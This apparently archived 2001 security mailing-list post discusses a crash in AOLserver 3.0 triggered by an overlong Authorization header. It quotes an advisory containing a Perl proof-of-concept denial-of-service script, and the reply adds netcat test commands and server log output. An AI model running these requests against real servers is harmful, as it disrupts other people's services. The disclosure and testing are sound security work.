Today I downloaded aolserver-3.0.tar.gz ... here are my test results. echo "GET /`perl -e 'print "A" x 2348'`" HTTP/1.0\r\n\ r\n" | nc localhost 8000 [22/Aug/2001:21:57:00][12425.5124][-conn2-] Error: nsd.fastpath: stat(/tmp/aolserver/servers/server1/pages/ HTTP/1.0\nAuthorization: Basic AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...) failed: File name too long echo "GET /"`perl -e 'print "A" x 2348'`" HTTP/1.0\r\n \r\n" | nc localhost 8000 [22/Aug/2001:22:00:06][12425.6148][-conn3-] Error: nsd.fastpath: stat(/tmp/aolserver/servers/server1/pages/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...) failed: File name too long -KF Nate Haggard wrote: > > Aolserver 3.0 will crash when it is given a long authorization string. It > is also possible this vulnerability will allow a hacker to execute > arbitrary code through a buffer overflow. I have not verified a buffer > overflow exists. Aolserver 3.4 and 3.3.1 are not vulnerable to this attack. > > Here is a sample exploit: > ------------------------------------------ > #!/usr/bin/perl > use IO::Socket; > unless (@ARGV == 1) { die "usage: $0 host ..." } > $host = shift(@ARGV); > $remote = IO::Socket::INET->new( Proto => "tcp", > PeerAddr => $host, > PeerPort => "http(80)", > ); > unless ($remote) { die "cannot connect to http daemon on $host" } > > $junk = "X" x 2048; > $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n"; > $remote->autoflush(1); > print $remote $killme; > close $remote; > > -------------------- > Nate Haggard > SecurityLogics.com
This archive was generated by hypermail 2b30 : Thu Aug 23 2001 - 07:42:36 PDT